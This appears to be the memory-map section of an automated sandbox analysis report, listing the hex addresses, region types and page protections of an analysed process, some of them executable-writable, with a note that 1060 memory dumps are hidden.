page read and write
2518000
heap
page read and write
764000
heap
page read and write
550000
heap
page read and write
5CE000
heap
page read and write
AA0000
trusted library allocation
page read and write
3456000
heap
page read and write
5D8E000
stack
page read and write
5CCE000
stack
page read and write
7F6000
heap
page read and write
210000
trusted library allocation
page read and write
4F3E000
stack
page read and write | page guard
10000
heap
page read and write
7EF000
heap
page read and write
3C6000
heap
page read and write
83A000
trusted library allocation
page read and write
248D000
trusted library allocation
page read and write
48B000
heap
page read and write
5072000
heap
page read and write
19C000
stack
page read and write
247E000
trusted library allocation
page read and write
813000
heap
page read and write
2EB000
heap
page read and write
5DDF000
stack
page read and write
35F000
heap
page read and write
3270000
trusted library allocation
page read and write
310000
heap
page read and write
285000
trusted library allocation
page execute and read and write
2EAF000
trusted library allocation
page read and write
1A0000
trusted library allocation
page read and write
50CE000
stack
page read and write
3839000
heap
page read and write
2C6B000
heap
page read and write
560000
heap
page read and write
49D000
heap
page read and write
308000
heap
page read and write
4B9E000
stack
page read and write
10D21000
trusted library allocation
page read and write
240000
heap
page read and write
93C0000
heap
page read and write
2522000
heap
page read and write
3AB0000
heap
page read and write
202000
trusted library allocation
page read and write
2541000
heap
page read and write
17C000
stack
page read and write
446F000
stack
page read and write
3E49000
heap
page read and write
3DB0000
heap
page read and write
6D0000
heap
page read and write
2BFC000
heap
page read and write
926000
heap
page read and write
214000
trusted library allocation
page read and write
26E1000
trusted library allocation
page read and write
4C23000
heap
page read and write
3020000
heap
page read and write
4AF5000
heap
page read and write
30CE000
stack
page read and write
360000
heap
page read and write
9FE000
heap
page read and write
3271000
trusted library allocation
page read and write
24C5000
trusted library allocation
page read and write
98F000
heap
page read and write
37BC000
heap
page read and write
2783000
trusted library allocation
page read and write
5DAE000
stack
page read and write
23F000
heap
page read and write
37F2000
heap
page read and write
10016000
direct allocation
page execute and read and write
45D000
system
page execute and read and write
41DD000
stack
page read and write
323000
heap
page read and write
4E90000
heap
page read and write
398000
heap
page read and write
3CA000
heap
page read and write
3B80000
heap
page read and write
8C0000
trusted library allocation
page read and write
79A000
heap
page read and write
4F37000
heap
page read and write
32B000
heap
page read and write
850000
heap
page execute and read and write
26A000
trusted library allocation
page read and write
9B5F000
heap
page read and write
3CDF000
stack
page read and write
4AEF000
stack
page read and write
3E0000
heap
page read and write
762000
heap
page read and write
960000
heap
page read and write
33E000
heap
page read and write
CB000
stack
page read and write
4C26000
heap
page read and write
96F0000
trusted library allocation
page read and write
880000
trusted library allocation
page execute and read and write
1DD2000
heap
page read and write
38F000
heap
page read and write
8D000
stack
page read and write
1F10000
heap
page read and write
2300000
trusted library allocation
page read and write
950000
trusted library allocation
page read and write
190000
heap
page read and write
246C000
heap
page read and write
4DCE000
stack
page read and write
476000
stack
page read and write
24AB000
trusted library allocation
page read and write
7753000
trusted library allocation
page read and write
8E0000
trusted library allocation
page read and write
3B7F000
stack
page read and write
9760000
trusted library allocation
page read and write
3AFF000
heap
page read and write
5CB000
heap
page read and write
4390000
heap
page execute and read and write
8321000
trusted library allocation
page read and write
349000
heap
page read and write
870000
heap
page read and write
557000
heap
page read and write
4C22000
heap
page read and write
2302000
trusted library allocation
page read and write
2E80000
heap
page read and write
353000
heap
page read and write
890000
trusted library allocation
page read and write
6B5000
trusted library allocation
page execute and read and write
8E60000
heap
page read and write
3C7000
heap
page read and write
3829000
heap
page read and write
2AF000
stack
page read and write
3E40000
heap
page read and write
50C0000
heap
page read and write
4B0000
heap
page read and write
205000
trusted library allocation
page execute and read and write
2C10000
heap
page read and write
2BE0000
heap
page read and write
91F000
stack
page read and write
153000
trusted library allocation
page execute and read and write
2250000
trusted library allocation
page read and write
725000
heap
page read and write
2E8000
heap
page read and write
4C22000
heap
page read and write
51A000
heap
page read and write
45F000
heap
page read and write
C0000
heap
page read and write
5E8E000
stack
page read and write
6160000
heap
page read and write
747000
heap
page read and write
3841000
heap
page read and write
1D0000
heap
page read and write
6B4000
heap
page read and write
337000
heap
page read and write
383A000
heap
page read and write
A00000
trusted library allocation
page read and write
720000
trusted library allocation
page read and write
4DDE000
stack
page read and write
A10000
trusted library allocation
page read and write
4F3F000
stack
page read and write
7E17000
trusted library allocation
page read and write
7B69000
trusted library allocation
page read and write
35D000
stack
page read and write
1E4000
heap
page read and write
3CA000
heap
page read and write
3AFB000
heap
page read and write
484E000
stack
page read and write
297000
stack
page read and write
832000
heap
page read and write
37D4000
heap
page read and write
A8E000
stack
page read and write
3B8000
trusted library allocation
page read and write
6B0000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
2280000
trusted library allocation
page read and write
10001000
direct allocation
page execute and read and write
48A0000
trusted library allocation
page read and write
930000
trusted library allocation
page read and write
4C3F000
heap
page read and write
432A000
stack
page read and write
241F000
stack
page read and write
9EE000
stack
page read and write
9760000
trusted library allocation
page read and write
2518000
heap
page read and write
2C64000
heap
page read and write
2B13000
trusted library allocation
page read and write
4AFF000
stack
page read and write
There are 1060 hidden memdumps, click here to show them.